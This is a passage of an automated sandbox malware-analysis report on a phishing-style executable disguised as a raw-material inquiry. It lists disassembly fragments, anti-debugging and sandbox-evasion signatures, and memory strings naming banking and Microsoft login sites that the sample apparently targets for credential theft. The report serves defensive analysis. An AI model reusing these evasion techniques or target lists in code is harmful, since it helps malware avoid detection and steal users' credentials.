              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EB5C28 pushad ; iretd 10_2_02EB5C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBDD8B push eax; iretd 10_2_02EBDDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352B3C4 push edi; ret 10_2_0352B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352B3C8 push edi; ret 10_2_0352B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03535202 push eax; ret 10_2_03535204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_035271EA push es; ret 10_2_035271EB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352C033 push ss; iretd 10_2_0352C036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352BA5F push cs; retf 10_2_0352BA67
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352AE60 push ds; retf 10_2_0352AE61
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056DFFDC push 1537E110h; ret 11_2_056DFFE4
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056E5EED push cs; retf 11_2_056E5EF6
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056E686A push FFFFFFADh; ret 11_2_056E686C
              Source: CSZ inquiry for MH raw material.exeStatic PE information: section name: .text entropy: 7.995275199427175
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0154096E rdtsc 0_2_0154096E
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 1800Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 8172Jump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.7 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 6356Thread sleep count: 1800 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 6356Thread sleep time: -3600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 6356Thread sleep count: 8172 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 6356Thread sleep time: -16344000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe TID: 6828Thread sleep time: -40000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBC870 FindFirstFileW,FindNextFileW,FindClose,10_2_02EBC870
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: 17O3k-2I.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: 17O3k-2I.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: 17O3k-2I.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: AMC password management pageVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: mSWyWMUGFWJCYT.exe, 0000000B.00000002.2507285876.000000000126F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: 17O3k-2I.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: 17O3k-2I.10.drBinary or memory string: discord.comVMware20,11696492231f
              Source: fc.exe, 0000000A.00000002.2505857523.0000000003280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 17O3k-2I.10.drBinary or memory string: global block list test formVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: 17O3k-2I.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: 17O3k-2I.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: 17O3k-2I.10.drBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: 17O3k-2I.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: 17O3k-2I.10.drBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: 17O3k-2I.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: 17O3k-2I.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: 17O3k-2I.10.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: 17O3k-2I.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: 17O3k-2I.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: 17O3k-2I.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: firefox.exe, 0000000D.00000002.1963999164.00000299A7A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0154096E rdtsc 0_2_0154096E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E77CA3 LdrLoadDll,0_2_00E77CA3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01598158 mov eax, dword ptr fs:[00000030h]0_2_01598158
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506154 mov eax, dword ptr fs:[00000030h]0_2_01506154
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506154 mov eax, dword ptr fs:[00000030h]0_2_01506154
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FC156 mov eax, dword ptr fs:[00000030h]0_2_014FC156
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01594144 mov eax, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01594144 mov eax, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01594144 mov ecx, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01594144 mov eax, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01594144 mov eax, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4164 mov eax, dword ptr fs:[00000030h]0_2_015D4164
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4164 mov eax, dword ptr fs:[00000030h]0_2_015D4164
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AA118 mov ecx, dword ptr fs:[00000030h]0_2_015AA118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AA118 mov eax, dword ptr fs:[00000030h]0_2_015AA118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AA118 mov eax, dword ptr fs:[00000030h]0_2_015AA118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AA118 mov eax, dword ptr fs:[00000030h]0_2_015AA118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C0115 mov eax, dword ptr fs:[00000030h]0_2_015C0115
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov ecx, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov ecx, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov ecx, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE10E mov ecx, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01530124 mov eax, dword ptr fs:[00000030h]0_2_01530124
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E1D0 mov eax, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E1D0 mov eax, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E1D0 mov eax, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E1D0 mov eax, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C61C3 mov eax, dword ptr fs:[00000030h]0_2_015C61C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C61C3 mov eax, dword ptr fs:[00000030h]0_2_015C61C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015301F8 mov eax, dword ptr fs:[00000030h]0_2_015301F8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D61E5 mov eax, dword ptr fs:[00000030h]0_2_015D61E5
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158019F mov eax, dword ptr fs:[00000030h]0_2_0158019F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158019F mov eax, dword ptr fs:[00000030h]0_2_0158019F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158019F mov eax, dword ptr fs:[00000030h]0_2_0158019F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158019F mov eax, dword ptr fs:[00000030h]0_2_0158019F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01540185 mov eax, dword ptr fs:[00000030h]0_2_01540185
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BC188 mov eax, dword ptr fs:[00000030h]0_2_015BC188
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BC188 mov eax, dword ptr fs:[00000030h]0_2_015BC188
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FA197 mov eax, dword ptr fs:[00000030h]0_2_014FA197
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FA197 mov eax, dword ptr fs:[00000030h]0_2_014FA197
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FA197 mov eax, dword ptr fs:[00000030h]0_2_014FA197
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A4180 mov eax, dword ptr fs:[00000030h]0_2_015A4180
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A4180 mov eax, dword ptr fs:[00000030h]0_2_015A4180
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01502050 mov eax, dword ptr fs:[00000030h]0_2_01502050
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01586050 mov eax, dword ptr fs:[00000030h]0_2_01586050
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152C073 mov eax, dword ptr fs:[00000030h]0_2_0152C073
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E016 mov eax, dword ptr fs:[00000030h]0_2_0151E016
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E016 mov eax, dword ptr fs:[00000030h]0_2_0151E016
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E016 mov eax, dword ptr fs:[00000030h]0_2_0151E016
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E016 mov eax, dword ptr fs:[00000030h]0_2_0151E016
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01584000 mov ecx, dword ptr fs:[00000030h]0_2_01584000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01596030 mov eax, dword ptr fs:[00000030h]0_2_01596030
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FA020 mov eax, dword ptr fs:[00000030h]0_2_014FA020
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FC020 mov eax, dword ptr fs:[00000030h]0_2_014FC020
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015820DE mov eax, dword ptr fs:[00000030h]0_2_015820DE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015420F0 mov ecx, dword ptr fs:[00000030h]0_2_015420F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FA0E3 mov ecx, dword ptr fs:[00000030h]0_2_014FA0E3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015860E0 mov eax, dword ptr fs:[00000030h]0_2_015860E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015080E9 mov eax, dword ptr fs:[00000030h]0_2_015080E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FC0F0 mov eax, dword ptr fs:[00000030h]0_2_014FC0F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150208A mov eax, dword ptr fs:[00000030h]0_2_0150208A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C60B8 mov eax, dword ptr fs:[00000030h]0_2_015C60B8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C60B8 mov ecx, dword ptr fs:[00000030h]0_2_015C60B8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F80A0 mov eax, dword ptr fs:[00000030h]0_2_014F80A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015980A8 mov eax, dword ptr fs:[00000030h]0_2_015980A8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158035C mov ecx, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A8350 mov ecx, dword ptr fs:[00000030h]0_2_015A8350
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CA352 mov eax, dword ptr fs:[00000030h]0_2_015CA352
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D634F mov eax, dword ptr fs:[00000030h]0_2_015D634F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A437C mov eax, dword ptr fs:[00000030h]0_2_015A437C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01520310 mov ecx, dword ptr fs:[00000030h]0_2_01520310
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FC310 mov ecx, dword ptr fs:[00000030h]0_2_014FC310
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D8324 mov ecx, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE3DB mov ecx, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A43D4 mov eax, dword ptr fs:[00000030h]0_2_015A43D4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A43D4 mov eax, dword ptr fs:[00000030h]0_2_015A43D4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BC3CD mov eax, dword ptr fs:[00000030h]0_2_015BC3CD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015863C0 mov eax, dword ptr fs:[00000030h]0_2_015863C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015363FF mov eax, dword ptr fs:[00000030h]0_2_015363FF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
